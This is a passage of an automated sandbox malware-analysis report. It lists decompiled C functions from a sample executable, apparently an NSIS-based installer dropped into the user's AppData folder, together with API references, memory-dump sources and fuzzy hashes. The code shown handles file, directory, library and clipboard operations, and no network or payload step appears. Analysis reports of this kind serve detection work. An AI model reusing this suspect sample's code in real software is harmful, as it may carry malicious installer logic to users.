										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                              0x00403196
                                                              0x0040319f
                                                              0x004031a8
                                                              0x004031ac
                                                              0x004031b7
                                                              0x004031b7
                                                              0x004031bf
                                                              0x004031c6
                                                              0x004031d8
                                                              0x004031df
                                                              0x00403284
                                                              0x00403284
                                                              0x00000000
                                                              0x004031e5
                                                              0x004031e8
                                                              0x004031f4
                                                              0x004031f8
                                                              0x00403292
                                                              0x00403292
                                                              0x004031fe
                                                              0x00403201
                                                              0x00403260
                                                              0x00403266
                                                              0x00403268
                                                              0x00403268
                                                              0x0040327a
                                                              0x00403282
                                                              0x00403289
                                                              0x0040328c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403203
                                                              0x00403206
                                                              0x00000000
                                                              0x0040320c
                                                              0x00403211
                                                              0x00403218
                                                              0x0040321b
                                                              0x0040321d
                                                              0x0040321d
                                                              0x0040322a
                                                              0x00403234
                                                              0x00000000
                                                              0x00000000
                                                              0x0040323d
                                                              0x00403244
                                                              0x0040325c
                                                              0x00403286
                                                              0x00403286
                                                              0x00403246
                                                              0x00403246
                                                              0x00403249
                                                              0x0040324c
                                                              0x00403252
                                                              0x00403258
                                                              0x00000000
                                                              0x0040325a
                                                              0x00000000
                                                              0x0040325a
                                                              0x00403258
                                                              0x00000000
                                                              0x00403244
                                                              0x00000000
                                                              0x00403211
                                                              0x00403206
                                                              0x00403201
                                                              0x004031f8
                                                              0x004031df
                                                              0x00403294
                                                              0x00403297

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                              • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                                              • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                              • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}










                                                              0x0040138a
                                                              0x004013fa
                                                              0x0040139b
                                                              0x004013a0
                                                              0x00000000
                                                              0x00000000
                                                              0x004013a2
                                                              0x004013a3
                                                              0x004013ad
                                                              0x00000000
                                                              0x00401404
                                                              0x004013b0
                                                              0x004013b7
                                                              0x004013bd
                                                              0x004013be
                                                              0x004013c0
                                                              0x004013c2
                                                              0x004013b9
                                                              0x004013b9
                                                              0x004013ba
                                                              0x004013ba
                                                              0x004013c9
                                                              0x004013cb
                                                              0x004013f4
                                                              0x004013f4
                                                              0x004013c9
                                                              0x00000000

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                              • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                                              • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                              • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                              0x00406639
                                                              0x0040663c
                                                              0x00406643
                                                              0x0040664b
                                                              0x00406657
                                                              0x00000000
                                                              0x0040665e
                                                              0x0040664e
                                                              0x00406655
                                                              0x00000000
                                                              0x00406666
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                                • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                                                • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                                                • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                              • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                                              • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                              • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 68%
                                                              			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                              0x00405dc5
                                                              0x00405dd2
                                                              0x00405de7
                                                              0x00405ded

                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\AppData\Roaming\propser16364.exe,80000000,00000003), ref: 00405DC5
                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                              • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                              • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                              • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                              0x00405da1
                                                              0x00405da7
                                                              0x00405dac
                                                              0x00405db5
                                                              0x00405db5
                                                              0x00405dbe

                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                              • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                                              • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                              • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                              0x00405898
                                                              0x004058a0
                                                              0x00000000
                                                              0x004058a6
                                                              0x00000000

                                                              APIs
                                                              • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                              • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                                              • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                              • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                              0x00405e6c
                                                              0x00405e7c
                                                              0x00405e84
                                                              0x00000000
                                                              0x00405e8b
                                                              0x00000000
                                                              0x00405e8d

                                                              APIs
                                                              • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E7C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                              0x00405e3d
                                                              0x00405e4d
                                                              0x00405e55
                                                              0x00000000
                                                              0x00405e5c
                                                              0x00000000
                                                              0x00405e5e

                                                              APIs
                                                              • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E4D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                              • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                                              • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                              • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                              0x00403427
                                                              0x0040342d

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                              0x00405493
                                                              0x0040549b
                                                              0x0040549e
                                                              0x004054a6
                                                              0x004054a9
                                                              0x00405638
                                                              0x0040563e
                                                              0x00405662
                                                              0x00405662
                                                              0x0040566e
                                                              0x00405674
                                                              0x00405696
                                                              0x00405696
                                                              0x0040569c
                                                              0x004056f1
                                                              0x004056f1
                                                              0x004056f4
                                                              0x00000000
                                                              0x00000000
                                                              0x004056f6
                                                              0x004056f9
                                                              0x004056fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00405706
                                                              0x0040570c
                                                              0x0040570e
                                                              0x00405711
                                                              0x0040580e
                                                              0x00000000
                                                              0x0040580e
                                                              0x00405720
                                                              0x0040572c
                                                              0x00405735
                                                              0x0040573c
                                                              0x00405740
                                                              0x00405743
                                                              0x0040574c
                                                              0x00405752
                                                              0x00405755
                                                              0x00405755
                                                              0x00405765
                                                              0x0040576b
                                                              0x0040576e
                                                              0x00405779
                                                              0x00405779
                                                              0x0040577a
                                                              0x0040577d
                                                              0x00405784
                                                              0x0040578b
                                                              0x00405793
                                                              0x00405793
                                                              0x004057a1
                                                              0x004057a7
                                                              0x004057aa
                                                              0x004057aa
                                                              0x004057b1
                                                              0x004057b7
                                                              0x004057c0
                                                              0x004057c7
                                                              0x004057d0
                                                              0x004057d2
                                                              0x004057d5
                                                              0x004057e4
                                                              0x004057e6
                                                              0x004057e9
                                                              0x004057ea
                                                              0x004057ed
                                                              0x004057ee
                                                              0x004057ef
                                                              0x004057ef
                                                              0x004057f7
                                                              0x00405802
                                                              0x00405808
                                                              0x00405808
                                                              0x00000000
                                                              0x0040576e
                                                              0x0040569e
                                                              0x004056a4
                                                              0x004056d2
                                                              0x004056d4
                                                              0x004056da
                                                              0x004056e5
                                                              0x004056e5
                                                              0x004056ec
                                                              0x00000000
                                                              0x004056ec
                                                              0x004056a8
                                                              0x004056b2
                                                              0x00000000
                                                              0x00405676
                                                              0x00405676
                                                              0x0040567c
                                                              0x004056b7
                                                              0x00000000
                                                              0x004056be
                                                              0x00405685
                                                              0x0040568c
                                                              0x00405691
                                                              0x00000000
                                                              0x00405691
                                                              0x00405674
                                                              0x004054af
                                                              0x004054b3
                                                              0x004054bb
